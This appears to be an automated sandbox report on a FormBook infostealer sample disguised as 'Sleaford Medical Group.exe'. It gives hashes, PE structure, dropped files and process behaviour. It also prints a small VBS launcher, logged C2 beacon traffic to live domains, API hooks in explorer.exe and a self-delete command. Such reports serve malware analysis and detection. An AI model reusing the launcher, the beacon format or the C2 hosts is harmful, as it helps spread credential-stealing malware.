                                  C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Process: C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category: dropped
                                  Size (bytes): 106496
                                  Entropy (8bit): 5.644325868779004
                                  Encrypted: false
                                  SSDEEP: 1536:mnA+SyZTzpDk5xhps4CW9c6mc1wTYrYg7OsmHevXnqlY:mnlSCuTnCWzfw81gHUXnqu
                                  MD5: DDE7E39D025B75849184C077517030AE
                                  SHA1: 6350E468239B6099421676FB6FF289A27F8CDA5A
                                  SHA-256: BA1AE604539B6CDE921342BAACEB3EB82149B0F15C369B77020B38254A586629
                                  SHA-512: 9FB2C6A926BF66602FFCE354AF6D8C7906D8E3177DF49A640B05CF99C2729239F6EC2806E3422EEBF4A76285B1C1B5C75D20F042A8D3A89207692C4DE17A9A3F
                                  Malicious: true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 11%
                                  Reputation: low
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L......X.................p... ......X.............@.................................a........................................w..(...........................................................................(... .......H............................text...Dm.......p.................. ..`.data...............................@....rsrc...............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs
                                  Process: C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  File Type: ASCII text, with CRLF line terminators
                                  Category: dropped
                                  Size (bytes): 118
                                  Entropy (8bit): 4.912827526146584
                                  Encrypted: false
                                  SSDEEP: 3:jfF+m8nhvF3mRDWXp5cViE2J5xAIimYVGMGE9Al:jFqhv9IWXp+N23faGRF
                                  MD5: A0E46FC6089CF4C41E77819A9F42A5C3
                                  SHA1: 24C0E7BFBE9A7C3E255F781FC5664CA5DCA70EEF
                                  SHA-256: 8A37873731D9BB641F08AB5DA52BA395480F7A77CA4C0F8AAC489EE5832A9527
                                  SHA-512: 82F58297629507F385E164CD509BFD7F128AAAB6CDF7E969A02C81FA4A5CD4BA322657801FCDB7A02B58E3511F0F1030CFA4EEA31A14879273A5BE325857277C
                                  Malicious: true
                                  Reputation: low
                                  Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe")

                                  Static File Info

                                  General

                                  File type: PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit): 5.644325868779004
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.15%
                                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name: Sleaford Medical Group.exe
                                  File size: 106496
                                  MD5: dde7e39d025b75849184c077517030ae
                                  SHA1: 6350e468239b6099421676fb6ff289a27f8cda5a
                                  SHA256: ba1ae604539b6cde921342baaceb3eb82149b0f15c369b77020b38254a586629
                                  SHA512: 9fb2c6a926bf66602ffce354af6d8c7906d8e3177df49a640b05cf99c2729239f6ec2806e3422eebf4a76285b1c1b5c75d20f042a8d3a89207692c4de17a9a3f
                                  SSDEEP: 1536:mnA+SyZTzpDk5xhps4CW9c6mc1wTYrYg7OsmHevXnqlY:mnlSCuTnCWzfw81gHUXnqu
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......X.................p... ......X.............@................

                                  File Icon

                                  Icon Hash: 00649090b8b0cdf0

                                  Static PE Info

                                  General

                                  Entrypoint: 0x401858
                                  Entrypoint Section: .text
                                  Digitally signed: false
                                  Imagebase: 0x400000
                                  Subsystem: windows gui
                                  Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                  DLL Characteristics:
                                  Time Stamp: 0x580D0006 [Sun Oct 23 18:23:02 2016 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major: 4
                                  OS Version Minor: 0
                                  File Version Major: 4
                                  File Version Minor: 0
                                  Subsystem Version Major: 4
                                  Subsystem Version Minor: 0
                                  Import Hash: 6369448e9215188ae68ccd0107a30bdd

                                  Entrypoint Preview

                                  Instruction
                                  push 0040BF38h
                                  call 00007F08D096FC83h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  inc eax
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dl, bh
                                  test esp, edx
                                  xchg byte ptr [esi], ah

                                  Data Directories

                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x177d4 | 0x28 | .text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0xefe | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x148 | .text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                  Sections

                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0x16d44 | 0x17000 | False | 0.392153532609 | data | 5.98327704966 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .data | 0x18000 | 0xb08 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0x19000 | 0xefe | 0x1000 | False | 0.356689453125 | data | 3.41873073614 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                  Resources

                                  Name | RVA | Size | Type | Language | Country
                                  RT_ICON | 0x19c16 | 0x2e8 | data | |
                                  RT_ICON | 0x1936e | 0x8a8 | data | |
                                  RT_GROUP_ICON | 0x1934c | 0x22 | data | |
                                  RT_VERSION | 0x19120 | 0x22c | data | English | United States

                                  Imports

                                  DLL | Import
                                  MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaR4Str, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeObj, __vbaFreeStr

                                  Version Infos

                                  Description | Data
                                  Translation | 0x0409 0x04b0
                                  InternalName | SEMICALCINED
                                  FileVersion | 1.00
                                  Comments | AxisC Corp.
                                  ProductName | Fleksibles
                                  ProductVersion | 1.00
                                  OriginalFilename | SEMICALCINED.exe

                                  Possible Origin

                                  Language of compilation system | Country where language is spoken | Map
                                  English | United States |

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets


                                  UDP Packets

                                  Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                  Feb 25, 2021 15:42:59.665713072 CET  56777        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:42:59.714483976 CET  53           56777      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:42:59.747895002 CET  58643        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:42:59.796612024 CET  53           58643      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:42:59.926422119 CET  60985        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:42:59.983640909 CET  53           60985      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:01.094799995 CET  50200        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:01.152208090 CET  53           50200      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:02.056389093 CET  51281        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:02.105123997 CET  53           51281      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:03.347821951 CET  49199        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:03.406518936 CET  53           49199      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:05.362844944 CET  50620        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:05.423094988 CET  53           50620      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:09.599637032 CET  64938        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:09.648775101 CET  53           64938      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:10.500262976 CET  60152        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:10.551757097 CET  53           60152      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:11.549974918 CET  57544        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:11.598890066 CET  53           57544      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:12.713990927 CET  55984        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:12.762624979 CET  53           55984      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:13.728343010 CET  64185        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:13.776921034 CET  53           64185      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:15.741317034 CET  65110        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:15.792933941 CET  53           65110      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:16.899550915 CET  58361        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:16.948275089 CET  53           58361      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:17.790402889 CET  63492        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:17.840476036 CET  53           63492      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:29.933588982 CET  60831        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:29.985093117 CET  53           60831      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:31.979283094 CET  60100        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:32.036551952 CET  53           60100      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:34.518493891 CET  53195        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:34.579190016 CET  53           53195      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:45.906028032 CET  50141        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:45.957537889 CET  53           50141      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:46.964647055 CET  53023        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:47.021523952 CET  53           53023      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:43:54.866410017 CET  49563        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:43:54.915139914 CET  53           49563      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:03.891587019 CET  51352        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:03.943428993 CET  53           51352      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:05.724241972 CET  59349        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:05.776719093 CET  53           59349      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:06.648401976 CET  57084        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:06.697145939 CET  53           57084      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:11.729295015 CET  58823        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:11.778017044 CET  53           58823      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:44.154119015 CET  57568        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:44.203080893 CET  53           57568      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:44:56.863987923 CET  50540        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:44:56.922199965 CET  53           50540      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:45:17.204905987 CET  54366        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:45:17.279130936 CET  53           54366      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:45:20.969799042 CET  53034        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:45:21.144277096 CET  53           53034      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:01.225702047 CET  57762        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:01.286142111 CET  53           57762      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:03.266912937 CET  55435        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:03.328434944 CET  53           55435      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:03.989600897 CET  50713        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:04.052900076 CET  53           50713      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:04.553440094 CET  56132        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:04.613538027 CET  53           56132      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:05.365631104 CET  58987        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:05.425745010 CET  53           58987      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:06.025368929 CET  56579        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:06.101105928 CET  53           56579      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:06.698834896 CET  60633        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:06.758333921 CET  53           60633      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:10.732311964 CET  61292        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:10.794365883 CET  53           61292      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:15.136203051 CET  63619        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:15.193792105 CET  53           63619      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:15.676244020 CET  64938        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:15.725150108 CET  53           64938      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:46:58.401931047 CET  61946        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:46:58.466870070 CET  53           61946      8.8.8.8      192.168.2.3
                                  Feb 25, 2021 15:47:18.723651886 CET  64910        53         192.168.2.3  8.8.8.8
                                  Feb 25, 2021 15:47:18.785362005 CET  53           64910      8.8.8.8      192.168.2.3

                                  DNS Queries

                                  Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
                                  Feb 25, 2021 15:45:20.969799042 CET  192.168.2.3  8.8.8.8  0x1fc9    Standard query (0)  01677937777.burrow.io  A (IP address)  IN (0x0001)
                                  Feb 25, 2021 15:46:58.401931047 CET  192.168.2.3  8.8.8.8  0x7d8     Standard query (0)  www.landingberg.com    A (IP address)  IN (0x0001)
                                  Feb 25, 2021 15:47:18.723651886 CET  192.168.2.3  8.8.8.8  0xe5df    Standard query (0)  www.waymakers.site     A (IP address)  IN (0x0001)

                                  DNS Answers

                                  Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                   CName           Address          Type                    Class
                                  Feb 25, 2021 15:45:21.144277096 CET  8.8.8.8      192.168.2.3  0x1fc9    No error (0)  01677937777.burrow.io                  159.203.144.58   A (IP address)          IN (0x0001)
                                  Feb 25, 2021 15:46:58.466870070 CET  8.8.8.8      192.168.2.3  0x7d8     No error (0)  www.landingberg.com                    104.21.89.82     A (IP address)          IN (0x0001)
                                  Feb 25, 2021 15:46:58.466870070 CET  8.8.8.8      192.168.2.3  0x7d8     No error (0)  www.landingberg.com                    172.67.139.17    A (IP address)          IN (0x0001)
                                  Feb 25, 2021 15:47:18.785362005 CET  8.8.8.8      192.168.2.3  0xe5df    No error (0)  www.waymakers.site     waymakers.site                   CNAME (Canonical name)  IN (0x0001)
                                  Feb 25, 2021 15:47:18.785362005 CET  8.8.8.8      192.168.2.3  0xe5df    No error (0)  waymakers.site                         184.168.131.241  A (IP address)          IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.landingberg.com

                                  HTTP Packets

                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                  0           192.168.2.3  49745        104.21.89.82    80                C:\Windows\explorer.exe

                                  Timestamp                            kBytes transferred  Direction  Data
                                  Feb 25, 2021 15:46:58.520201921 CET  6676                OUT        GET /twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h HTTP/1.1
                                      Host: www.landingberg.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                  Feb 25, 2021 15:46:58.573807001 CET  6677                IN         HTTP/1.1 301 Moved Permanently
                                      Date: Thu, 25 Feb 2021 14:46:58 GMT
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Thu, 25 Feb 2021 15:46:58 GMT
                                      Location: https://www.landingberg.com/twy/?pPX=elx0UibK+4/Nbm+qsvCMZ/KEfRavAHzyccJHHIU1h6WwAO+M5fT0/YOmYv0X1fYwTcwa&Hp=V6AHd0O0h
                                      cf-request-id: 087b4158f70000d6ed28399000000001
                                      Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lOW1mDZ3VLduUYysi%2Fbkr3ycvbtlPQ652FKCtAUaOCAAN%2B2q2oGXGJvs1BwEslGo0a8Wil2bBIdhx85ViTCefAacb%2BPKpnNUViCz91K6zSnYXosj"}],"max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 62723807f806d6ed-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0
                                  HTTPS Packets

                                  Timestamp:   Feb 25, 2021 15:45:21.440952063 CET
                                  Source IP:   159.203.144.58    Source Port: 443
                                  Dest IP:     192.168.2.3       Dest Port:   49734
                                  Certificate chain:
                                      Subject: CN=burrow.io
                                          Issuer:     CN=R3, O=Let's Encrypt, C=US
                                          Not Before: Fri Jan 08 10:05:33 CET 2021
                                          Not After:  Thu Apr 08 11:05:33 CEST 2021
                                      Subject: CN=R3, O=Let's Encrypt, C=US
                                          Issuer:     CN=DST Root CA X3, O=Digital Signature Trust Co.
                                          Not Before: Wed Oct 07 21:21:40 CEST 2020
                                          Not After:  Wed Sep 29 21:21:40 CEST 2021
                                  JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
                                  JA3 SSL Client Digest:      37f463bf4616ecd445d4a1937da06e19

                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function Name  Hook Type  Active in Processes
                                  PeekMessageA   INLINE     explorer.exe
                                  PeekMessageW   INLINE     explorer.exe
                                  GetMessageW    INLINE     explorer.exe
                                  GetMessageA    INLINE     explorer.exe

                                  Processes

                                  Process: explorer.exe, Module: user32.dll
                                  Function Name  Hook Type  New Data
                                  PeekMessageA   INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                  PeekMessageW   INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                  GetMessageW    INLINE     0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                  GetMessageA    INLINE     0x48 0x8B 0xB8 0x81 0x1E 0xEB

                                  Statistics

                                  Behavior

                                  System Behavior

                                  General

                                  Start time:15:43:07
                                  Start date:25/02/2021
                                  Path:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Visual Basic
                                  Reputation:low

                                  General

                                  Start time:15:45:04
                                  Start date:25/02/2021
                                  Path:C:\Users\user\Desktop\Sleaford Medical Group.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.551412840.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.584974843.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  General

                                  Start time:15:45:24
                                  Start date:25/02/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0x7ff714890000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:15:45:28
                                  Start date:25/02/2021
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.vbs'
                                  Imagebase:0x7ff7cdf60000
                                  File size:163840 bytes
                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:15:45:30
                                  Start date:25/02/2021
                                  Path:C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\AppData\Local\Temp\Eftermiddages7\oversad.exe
                                  Imagebase:0x400000
                                  File size:106496 bytes
                                  MD5 hash:DDE7E39D025B75849184C077517030AE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Visual Basic
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 11%, ReversingLabs
                                  Reputation:low

                                  General

                                  Start time:15:45:44
                                  Start date:25/02/2021
                                  Path:C:\Windows\SysWOW64\help.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\help.exe
                                  Imagebase:0xe60000
                                  File size:10240 bytes
                                  MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.731485750.0000000003530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.731784931.0000000003560000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.731169512.000000000333D000.00000004.00000020.sdmp, Author: Florian Roth
                                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000001C.00000002.736741312.0000000003CCF000.00000004.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000002.730784207.0000000002EC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:moderate

                                  General

                                  Start time:15:45:53
                                  Start date:25/02/2021
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:/c del 'C:\Users\user\Desktop\Sleaford Medical Group.exe'
                                  Imagebase:0xac0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:15:45:54
                                  Start date:25/02/2021
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6b2800000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis